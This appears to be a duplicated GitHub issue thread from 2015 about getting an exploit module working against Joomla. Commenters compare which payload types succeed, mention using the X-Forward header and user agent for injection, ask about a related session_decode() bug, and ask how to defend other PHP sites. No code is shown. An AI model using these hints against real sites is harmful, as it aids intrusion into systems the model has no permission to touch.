If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.

—
Reply to this email directly or view it on GitHub
#6347 (comment).

[JohnMartinelli]

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.

—
Reply to this email directly or view it on GitHub
#6347 (comment).

[icehteam]

@ggg4566 X-Forward working in 3x , You need use user agent for some versions. @JohnMartinelli your late at the party fff...

[icehteam]

@ggg4566 X-Forward working in 3x , You need use user agent for some versions. @JohnMartinelli your late at the party fff...

[am06]

I've read that a session_decode() bug is needed for this to work....? Anyone can please tell me what's that bug about?

[am06]

I've read that a session_decode() bug is needed for this to work....? Anyone can please tell me what's that bug about?

[VivekShingala]

Is this error harmful for other frameworks like codeigniter or core php websites? Have found these logs in such frameworks. I do not use Joomla for most of the sites, however, still find this logs.

If yes, what steps to be taken to prevent?

[VivekShingala]

Is this error harmful for other frameworks like codeigniter or core php websites? Have found these logs in such frameworks. I do not use Joomla for most of the sites, however, still find this logs.

If yes, what steps to be taken to prevent?